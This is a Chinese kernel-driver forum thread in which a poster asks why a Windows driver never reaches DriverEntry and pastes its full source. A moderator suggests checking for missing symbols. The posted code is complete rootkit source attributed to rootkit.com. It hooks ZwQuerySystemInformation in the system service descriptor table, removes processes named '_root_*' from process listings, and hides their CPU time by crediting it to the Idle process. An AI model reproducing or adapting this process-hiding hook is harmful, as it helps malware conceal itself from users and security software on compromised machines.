驱动无法进入DriverEntry不能运行高手指点

楼主^#

更多发布于：2009-03-20 08:27

自己下的源码，经自己编译后，驱动无法进入DriverEntry，驱动根本无法运行。我在XP SP2上使用2000DDK，用DriverMonitor进行加载运行，自己在DriverEntry的第一条语句就是调试信息。高手指教，附上源码
#include "ntddk.h"

#pragma pack(1)
typedef struct ServiceDescriptorEntry {
   unsigned int *ServiceTableBase;
   unsigned int *ServiceCounterTableBase; //Used only in checked build
   unsigned int NumberOfServices;
   unsigned char *ParamTableBase;
} ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t;
#pragma pack()

__declspec(dllimport) ServiceDescriptorTableEntry_t KeServiceDescriptorTable;
#define SYSTEMSERVICE(_function) KeServiceDescriptorTable.ServiceTableBase[ *(PULONG)((PUCHAR)_function+1)]

PMDL g_pmdlSystemCall;
PVOID *MappedSystemCallTable;
#define SYSCALL_INDEX(_Function) *(PULONG)((PUCHAR)_Function+1)
#define HOOK_SYSCALL(_Function, _Hook, _Orig ) \
   _Orig = (PVOID) InterlockedExchange( (PLONG) &MappedSystemCallTable[SYSCALL_INDEX(_Function)], (LONG) _Hook)

#define UNHOOK_SYSCALL(_Function, _Hook, _Orig ) \
   InterlockedExchange( (PLONG) &MappedSystemCallTable[SYSCALL_INDEX(_Function)], (LONG) _Hook)

struct _SYSTEM_THREADS
{
   LARGE_INTEGER KernelTime;
   LARGE_INTEGER UserTime;
   LARGE_INTEGER CreateTime;
   ULONG WaitTime;
   PVOID StartAddress;
   CLIENT_ID ClientIs;
   KPRIORITY Priority;
   KPRIORITY BasePriority;
   ULONG ContextSwitchCount;
   ULONG ThreadState;
   KWAIT_REASON WaitReason;
};

struct _SYSTEM_PROCESSES
{
   ULONG NextEntryDelta;
   ULONG ThreadCount;
   ULONG Reserved[6];
   LARGE_INTEGER CreateTime;
   LARGE_INTEGER UserTime;
   LARGE_INTEGER KernelTime;
   UNICODE_STRING ProcessName;
   KPRIORITY BasePriority;
   ULONG ProcessId;
   ULONG InheritedFromProcessId;
   ULONG HandleCount;
   ULONG Reserved2[2];
   VM_COUNTERS VmCounters;
   IO_COUNTERS IoCounters; //windows 2000 only
   struct _SYSTEM_THREADS Threads[1];
};

// Added by Creative of rootkit.com
struct _SYSTEM_PROCESSOR_TIMES
{
   LARGE_INTEGER IdleTime;
   LARGE_INTEGER KernelTime;
   LARGE_INTEGER UserTime;
   LARGE_INTEGER DpcTime;
   LARGE_INTEGER InterruptTime;
   ULONG InterruptCount;
};

NTSYSAPI
NTSTATUS
NTAPI ZwQuerySystemInformation(
   IN ULONG SystemInformationClass,
   IN PVOID SystemInformation,
   IN ULONG SystemInformationLength,
   OUT PULONG ReturnLength);

typedef NTSTATUS (*ZWQUERYSYSTEMINFORMATION)(
   ULONG SystemInformationCLass,
   PVOID SystemInformation,
   ULONG SystemInformationLength,
   PULONG ReturnLength);

ZWQUERYSYSTEMINFORMATION OldZwQuerySystemInformation;

// Added by Creative of rootkit.com
LARGE_INTEGER m_UserTime;
LARGE_INTEGER m_KernelTime;

///////////////////////////////////////////////////////////////////////
// NewZwQuerySystemInformation function
//
// ZwQuerySystemInformation() returns a linked list of processes.
// The function below imitates it, except it removes from the list any
// process who's name begins with "_root_".
///////////////////////////////////////////////////////////////////////

NTSTATUS NewZwQuerySystemInformation(
   IN ULONG SystemInformationClass,
   IN PVOID SystemInformation,
   IN ULONG SystemInformationLength,
   OUT PULONG ReturnLength)
{

   NTSTATUS ntStatus;

   ntStatus = ((ZWQUERYSYSTEMINFORMATION)(OldZwQuerySystemInformation)) (
   SystemInformationClass,
   SystemInformation,
   SystemInformationLength,
   ReturnLength );

   if( NT_SUCCESS(ntStatus))
   {
   // Asking for a file and directory listing
   if(SystemInformationClass == 5)
   {
   // This is a query for the process list.
   // Look for process names that start with
   // '_root_' and filter them out.

   struct _SYSTEM_PROCESSES *curr = (struct _SYSTEM_PROCESSES *)SystemInformation;
   struct _SYSTEM_PROCESSES *prev = NULL;

   while(curr)
   {
   //DbgPrint("Current item is %x\n", curr);
   if (curr->ProcessName.Buffer != NULL)
   {
   if(0 == memcmp(curr->ProcessName.Buffer, L"_root_", 12))
   {
   m_UserTime.QuadPart += curr->UserTime.QuadPart;
   m_KernelTime.QuadPart += curr->KernelTime.QuadPart;

   if(prev) // Middle or Last entry
   {
   if(curr->NextEntryDelta)
   prev->NextEntryDelta += curr->NextEntryDelta;
   else // we are last, so make prev the end
   prev->NextEntryDelta = 0;
   }
   else
   {
   if(curr->NextEntryDelta)
   {
   // we are first in the list, so move it forward
   (char *)SystemInformation += curr->NextEntryDelta;
   }
   else // we are the only process!
   SystemInformation = NULL;
   }
   }
   }
   else // This is the entry for the Idle process
   {
   // Add the kernel and user times of _root_*
   // processes to the Idle process.
   curr->UserTime.QuadPart += m_UserTime.QuadPart;
   curr->KernelTime.QuadPart += m_KernelTime.QuadPart;

   // Reset the timers for next time we filter
   m_UserTime.QuadPart = m_KernelTime.QuadPart = 0;
   }
   prev = curr;
   if(curr->NextEntryDelta) ((char *)curr += curr->NextEntryDelta);
   else curr = NULL;
   }
   }
   else if (SystemInformationClass == 8) // Query for SystemProcessorTimes
   {
   struct _SYSTEM_PROCESSOR_TIMES * times = (struct _SYSTEM_PROCESSOR_TIMES *)SystemInformation;
   times->IdleTime.QuadPart += m_UserTime.QuadPart + m_KernelTime.QuadPart;
   }

   }
   return ntStatus;
}

VOID OnUnload(IN PDRIVER_OBJECT DriverObject)
{
   DbgPrint("ROOTKIT: OnUnload called\n");

   // unhook system calls
   UNHOOK_SYSCALL( ZwQuerySystemInformation, OldZwQuerySystemInformation, NewZwQuerySystemInformation );

   // Unlock and Free MDL
   if(g_pmdlSystemCall)
   {
   MmUnmapLockedPages(MappedSystemCallTable, g_pmdlSystemCall);
   IoFreeMdl(g_pmdlSystemCall);
   }
}

NTSTATUS DriverEntry(IN PDRIVER_OBJECT theDriverObject,
   IN PUNICODE_STRING theRegistryPath)
{
   // Register a dispatch function for Unload
   DbgPrint("DriverEntry Start\n");
   theDriverObject->DriverUnload = OnUnload;
   DbgPrint("DriverUnload get it\n");
   // Initialize global times to zero
   // These variables will account for the
   // missing time our hidden processes are
   // using.
   m_UserTime.QuadPart = m_KernelTime.QuadPart = 0;

   // save old system call locations
   OldZwQuerySystemInformation =(ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation));

   // Map the memory into our domain so we can change the permissions on the MDL
   g_pmdlSystemCall = MmCreateMdl(NULL, KeServiceDescriptorTable.ServiceTableBase, KeServiceDescriptorTable.NumberOfServices*4);
   if(!g_pmdlSystemCall)
   return STATUS_UNSUCCESSFUL;

   MmBuildMdlForNonPagedPool(g_pmdlSystemCall);

   // Change the flags of the MDL
   g_pmdlSystemCall->MdlFlags = g_pmdlSystemCall->MdlFlags | MDL_MAPPED_TO_SYSTEM_VA;

   MappedSystemCallTable = MmMapLockedPages(g_pmdlSystemCall, KernelMode);

   // hook system calls
   HOOK_SYSCALL( ZwQuerySystemInformation, NewZwQuerySystemInformation, OldZwQuerySystemInformation );

   return STATUS_SUCCESS;
}

喜欢0

znsoft

管理员

注册日期2001-03-23
最后登录2023-10-25
粉丝300
关注6
积分910分
威望14796点
贡献值7点
好评度2410点
原创分5分
专家分100分

加关注写私信

沙发^#

发布于：2009-03-20 13:10

建议你在目标运行平台上,用depends 工具软件看一下,有没有未定义的符合.

在驱动中经常发现编译平台上有的符合在运行平台上可能没有,导致无法加载

http://www.zndev.com 免费源码交换网 ----------------------------- 软件创造价值，驱动提供力量! 淡泊以明志，宁静以致远。 ---------------------------------- 勤用搜索，多查资料，先搜再问。

回复喜欢

sibling520 驱动牛犊注册日期2007-05-16 最后登录2016-01-09 粉丝0 关注0 积分10分威望81点贡献值0点好评度0点原创分0分专家分0分加关注写私信	板凳^# 发布于：2012-05-16 12:09 遇到同样的问题，wince平台
	回复(0) 喜欢(0)

reludson 驱动牛犊注册日期2004-01-29 最后登录2014-06-22 粉丝1 关注0 积分25分威望209点贡献值0点好评度20点原创分0分专家分1分加关注写私信	地板^# 发布于：2012-05-19 14:03
	回复(0) 喜欢(0)

您需要登录后才可以回帖，登录或者注册

驱动无法进入DriverEntry不能运行 高手指点

最新喜欢：

驱动无法进入DriverEntry不能运行高手指点